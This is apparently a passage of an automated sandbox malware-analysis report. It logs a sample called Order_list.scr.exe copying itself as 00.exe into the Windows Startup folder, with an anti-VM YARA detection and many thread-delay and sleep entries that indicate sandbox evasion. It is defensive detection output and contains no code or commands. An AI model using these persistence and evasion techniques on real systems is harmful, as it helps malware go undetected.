Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR

Source: C:\Users\user\Desktop\Order_list.scr.exe	Memory allocated: 930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Memory allocated: 2610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Memory allocated: 4610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Memory allocated: 1660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 2760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599824	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599699	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598936	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597382	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 597137	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596853	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596511	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596296	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594417	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594305	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Thread delayed: delay time: 594181	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598897	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598225	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597225	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594265	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3609	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Window / User API: threadDelayed 2755	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Window / User API: threadDelayed 7088	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3993	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1762	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Window / User API: threadDelayed 2557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Window / User API: threadDelayed 7292	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 3609 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4364	Thread sleep count: 300 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6628	Thread sleep count: 2755 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599824s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599699s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6628	Thread sleep count: 7088 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -599046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598936s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597382s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -597137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596853s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596511s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -596077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594417s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594305s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384	Thread sleep time: -594181s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6712	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7276	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6288	Thread sleep count: 3993 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240	Thread sleep count: 1762 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7248	Thread sleep count: 2557 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -599594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -599469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7248	Thread sleep count: 7292 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -599359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -599250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -599140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -599030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598897s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598225s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236	Thread sleep time: -597781s >= -30000s	Jump to behavior
